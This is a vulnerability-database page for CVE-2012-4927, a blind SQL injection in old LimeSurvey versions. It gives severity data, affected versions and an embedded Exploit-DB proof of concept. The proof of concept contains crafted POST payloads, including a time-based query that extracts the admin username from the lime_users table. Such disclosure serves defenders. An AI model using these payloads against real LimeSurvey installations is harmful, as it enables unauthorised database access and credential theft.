CVE-2012-4927

high

Published 2012-09-15 · Modified 2026-04-29

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

8.5

Description

SQL injection vulnerability in Limesurvey (a.k.a PHPSurveyor) before 1.91+ Build 120224 and earlier allows remote attackers to execute arbitrary SQL commands via the fieldnames parameter to index.php.

Predictions

Exploit likelihood

20%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-18508 webapps php text · 2 KB

TorTukiTu · 2012-02-22

LimeSurvey (PHPSurveyor 1.91+ stable) - Blind SQL Injection

text exploit Source: Exploit-DB

# Exploit Title: LimeSurvey Blind SQL injection
# Date: 20/02/2012
# Author: TorTukiTu - OpenSphere
# Version: 1.91+ build 11804
# Tested on: php

{cke_protected}{C}{cke_protected}{C}

-------------------------------------------------------------------------


# TorTukiTu - Killing Tortoise

 
#        ,-"""-. 
#   oo._/ \___/ \ 
#  (____)_/___\__\_) 
#      /_//   \\_\ 
# 



 

# Cookie hacking + Blind SQL Injection

 

# The vulnerability occurs when a user answers a survey (index.php).

# The session variables can be freely hacked using the following lines in save.php l.82 :

#             if (isset($_POST[$pf])) {$_SESSION[$pf] = $_POST[$pf];}

#            if (!isset($_POST[$pf])) {$_SESSION[$pf] = "";}

# $pf is user input in the POST variable

# once splitted, SQL request is directly build from those sessions variable by function createinsertquery(),

# if a special Post variable 'srid' is set both in the variable

# 'fieldnames' and as simple POST variable (query l. 715 save.php).

# The user can realize blind SQL injections with specially crafted POST variables.

 

# Normal POST variables example:

 

fieldnames=17165X6X18SQ001%7C17165X6X18SQ002%7C17165X6X18SQ003%7C17165X6X18SQ004%7C17165X6X18SQ005%7C17165X6X18SQ006%7C17165X6X18SQ007%7C17165X6X18other%7C17165X6X26SQ001%7C17165X6X26SQ002%7C17165X6X26SQ003

MULTI17165X6X18=8

tbdisp17...

...

start_time=1329742665

 

# Craft POST variables like this :

 

fieldnames=17165X6X18SQ001%7C17165X6X18SQ002%7C17165X6X18SQ003%7C17165X6X18SQ004%7C17165X6X18SQ005%7C17165X6X18SQ006%7C17165X6X18SQ007%7C17165X6X18other%7C17165X6X26SQ001%7C17165X6X26SQ002%7C17165X6X26SQ003%7C[VALID FIELD ID]` = [SQL INJECTION]--%7Csrid

MULTI17165X6X18=8

tbdisp17...

...

start_time=1329742665

srid=[SOME INTEGER]

 

#Example : Blind SQL user name guessing :

fieldnames=17165X6X18SQ001%7C17165X6X18SQ002%7C17165X6X18SQ003%7C17165X6X18SQ004%7C17165X6X18SQ005%7C17165X6X18SQ006%7C17165X6X18SQ007%7C17165X6X18other%7C17165X6X26SQ001%7C17165X6X26SQ002%7C17165X6X26SQ003%7C17165X6X18SQ001` = NULL WHERE id=6 AND id IN ( SELECT IF ( (SELECT SUBSTRING(users_name,1) FROM lime_users WHERE uid=1) LIKE 'a%', 1, SLEEP(5)))--%7Csrid

MULTI17165X6X18=8

tbdisp17...

...

start_time=1329742665

srid=42

 

 

-------------------------------------------------------------------------

Application impact

Vendor	Product	Versions
limesurvey	limesurvey
limesurvey	limesurvey	`1.5.2`
limesurvey	limesurvey	`1.49`
limesurvey	limesurvey	`1.49_rc2`
limesurvey	limesurvey	`1.52`
limesurvey	limesurvey	`1.70`
limesurvey	limesurvey	`1.80`
limesurvey	limesurvey	`1.80\+`
limesurvey	limesurvey	`1.81`
limesurvey	limesurvey	`1.81\+`

References

CWEs

CWE-89

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.